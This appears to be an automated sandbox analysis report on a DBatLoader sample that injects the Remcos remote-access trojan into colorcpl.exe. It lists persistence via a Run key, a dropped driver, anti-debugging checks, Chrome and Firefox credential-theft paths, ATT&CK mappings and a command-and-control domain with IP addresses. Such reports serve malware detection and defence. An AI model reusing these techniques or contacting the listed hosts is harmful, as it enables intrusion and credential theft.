              Source: Binary string: easinvoker.pdbGCTL source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AB1000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021A82000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.0000000000798000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.MeP66xi1AM.exe.2b30000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2115600641.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2193478070.0000000002317000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2115096749.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B487A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B487A0
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B5C2FC push 02B5C367h; ret 0_2_02B5C35F
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B332FC push eax; ret 0_2_02B33338
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3635A push 02B363B7h; ret 0_2_02B363AF
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3635C push 02B363B7h; ret 0_2_02B363AF
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B5C0AC push 02B5C125h; ret 0_2_02B5C11D
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B5C1F8 push 02B5C288h; ret 0_2_02B5C280
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B5C144 push 02B5C1ECh; ret 0_2_02B5C1E4
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B486C0 push 02B48702h; ret 0_2_02B486FA
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3673E push 02B36782h; ret 0_2_02B3677A
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B36740 push 02B36782h; ret 0_2_02B3677A
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3C4F4 push ecx; mov dword ptr [esp], edx0_2_02B3C4F9
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4E5B4 push ecx; mov dword ptr [esp], edx0_2_02B4E5B9
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3D528 push 02B3D554h; ret 0_2_02B3D54C
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3CB74 push 02B3CCFAh; ret 0_2_02B3CCF2
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B5BB6C push 02B5BD94h; ret 0_2_02B5BD8C
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3CB56 push 02B3CCFAh; ret 0_2_02B3CCF2
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B47894 push 02B47911h; ret 0_2_02B47909
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B468D0 push 02B4697Bh; ret 0_2_02B46973
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B468CE push 02B4697Bh; ret 0_2_02B46973
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4A920 push 02B4A958h; ret 0_2_02B4A950
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B48916 push 02B48950h; ret 0_2_02B48948
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4A91F push 02B4A958h; ret 0_2_02B4A950
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B48918 push 02B48950h; ret 0_2_02B48948
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B42EE8 push 02B42F5Eh; ret 0_2_02B42F56
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B45E04 push ecx; mov dword ptr [esp], edx0_2_02B45E06
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B42FF4 push 02B43041h; ret 0_2_02B43039
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B42FF3 push 02B43041h; ret 0_2_02B43039
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ADB4FD push esi; ret 5_2_04ADB506
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8008C push es; iretd 5_2_04A8008D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A800D8 push es; iretd 5_2_04A800D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AD42E6 push ecx; ret 5_2_04AD42F9

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeFile created: C:\Users\Public\Libraries\Wnbcdrjt.PIFJump to dropped file
              Sample is not signed and drops a device driver
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A863C6 ShellExecuteW,URLDownloadToFileW,5_2_04A863C6
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeFile created: C:\Users\Public\Libraries\Wnbcdrjt.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A98AC3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_04A98AC3
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WnbcdrjtJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WnbcdrjtJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B4A95C
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Allocates many large memory junks
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2B30000 memory commit 500006912Jump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2B31000 memory commit 500178944Jump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2B5C000 memory commit 500002816Jump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2B5D000 memory commit 500199424Jump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2B8E000 memory commit 501014528Jump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2C86000 memory commit 500006912Jump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: 2C88000 memory commit 500015104Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2C70000 memory commit 500006912Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2C71000 memory commit 500178944Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2C9C000 memory commit 500002816Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2C9D000 memory commit 500199424Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2CCE000 memory commit 501014528Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2DC6000 memory commit 500006912Jump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFMemory allocated: 2DC8000 memory commit 500015104Jump to behavior
              Delayed program exit found
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8E18D Sleep,ExitProcess,5_2_04A8E18D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_04A986FE
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9779Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 8.0 %
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7068Thread sleep time: -615000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7068Thread sleep time: -29337000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B358B4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A887A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04A887A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_04A9A01B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_04A8B28E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04A8838E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_04A8AC78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A868CD FindFirstFileW,FindNextFileW,5_2_04A868CD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A87848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_04A87848
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A97AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04A97AAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_04A8AA71
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ACBA59 FindFirstFileExA,5_2_04ACBA59
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A86D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04A86D28
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.0000000000816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: colorcpl.exe, 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
              Source: Wnbcdrjt.PIF, 00000007.00000002.2315649260.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr\
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeAPI call chain: ExitProcess graph end nodegraph_0-29019
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_5-94067
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFAPI call chain: ExitProcess graph end nodegraph_7-26938
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B4EBF0
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04AB27AE
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B487A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B487A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AC07B5 mov eax, dword ptr fs:[00000030h]5_2_04AC07B5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068D1117 mov eax, dword ptr fs:[00000030h]5_2_068D1117
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068D1117 mov eax, dword ptr fs:[00000030h]5_2_068D1117
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0691157A mov eax, dword ptr fs:[00000030h]5_2_0691157A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A90763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,5_2_04A90763
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04AB27AE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB2D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_04AB2D5C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB98AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04AB98AC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB28FC SetUnhandledExceptionFilter,5_2_04AB28FC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 68D0000 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 68D1656Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 68D0000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 68D0000Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_04A90B5C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A975E1 mouse_event,5_2_04A975E1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB29DA cpuid 5_2_04AB29DA
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B35A78
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: GetLocaleInfoA,0_2_02B3A798
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: GetLocaleInfoA,0_2_02B3A74C
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B35B84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_04ACF4F3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_04ACF61C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_04ACF7F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_04ACF723
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_04ACF130
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_04ACF17B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_04ACF2A3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,5_2_04A8E2BB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_04ACF216
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_04ACEEB8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_04AC5E1C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_04AC5914
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,7_2_02C75A78
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: GetLocaleInfoA,7_2_02C7A798
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,7_2_02C75B83
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B39194 GetLocalTime,0_2_02B39194
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A995F8 GetUserNameW,5_2_04A995F8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AC66BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_04AC66BF
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B3B714 GetVersionExA,0_2_02B3B714
              Source: C:\Windows\SysWOW64\colorcpl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_04A8A953
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_04A8AA71
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db5_2_04A8AA71

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L3FHGJJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe5_2_04A8567A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts              		1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              Valid Accounts              		1
              Valid Accounts              		2
              Obfuscated Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		1
              Windows Service              		11
              Access Token Manipulation              		1
              DLL Side-Loading              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		1
              Windows Service              		11
              Masquerading              		NTDS1
              System Network Connections Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script411
              Process Injection              		1
              Valid Accounts              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder              		2
              Virtualization/Sandbox Evasion              		Cached Domain Credentials45
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Access Token Manipulation              		DCSync331
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
              Process Injection              		Proc Filesystem2
              Virtualization/Sandbox Evasion              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
              Process Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              Application Window Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
              System Owner/User Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576964 Sample: MeP66xi1AM.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 37 hafiznor3374.duckdns.org 2->37 39 1010.filemail.com 2->39 41 ip.1010.filemail.com 2->41 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 65 13 other signatures 2->65 8 MeP66xi1AM.exe 1 9 2->8         started        13 Wnbcdrjt.PIF 5 2->13         started        signatures3 63 Uses dynamic DNS services 37->63 process4 dnsIp5 43 ip.1010.filemail.com 23.237.50.106, 443, 49707, 49708 COGENT-174US United States 8->43 29 C:\Users\Public\Libraries\Wnbcdrjt.PIF, PE32 8->29 dropped 31 C:\Users\Public\Wnbcdrjt.url, MS 8->31 dropped 33 C:\Users\Public\Libraries\Wnbcdrjt, data 8->33 dropped 35 C:\Users\Public\Libraries\FX.cmd, DOS 8->35 dropped 67 Drops PE files with a suspicious file extension 8->67 69 Writes to foreign memory regions 8->69 71 Allocates memory in foreign processes 8->71 79 4 other signatures 8->79 15 colorcpl.exe 4 8->15         started        19 cmd.exe 1 8->19         started        73 Multi AV Scanner detection for dropped file 13->73 75 Machine Learning detection for dropped file 13->75 77 Sample is not signed and drops a device driver 13->77 21 cmd.exe 13->21         started        23 colorcpl.exe 13->23         started        file6 signatures7 process8 dnsIp9 45 hafiznor3374.duckdns.org 192.169.69.26, 4610, 49710, 49742 WOWUS United States 15->45 47 127.0.0.1 unknown unknown 15->47 49 Detected Remcos RAT 15->49 51 Contains functionalty to change the wallpaper 15->51 53 Contains functionality to steal Chrome passwords or cookies 15->53 55 3 other signatures 15->55 25 conhost.exe 19->25         started        27 conhost.exe 21->27         started        signatures10 process11

              Screenshots

              Thumbnails

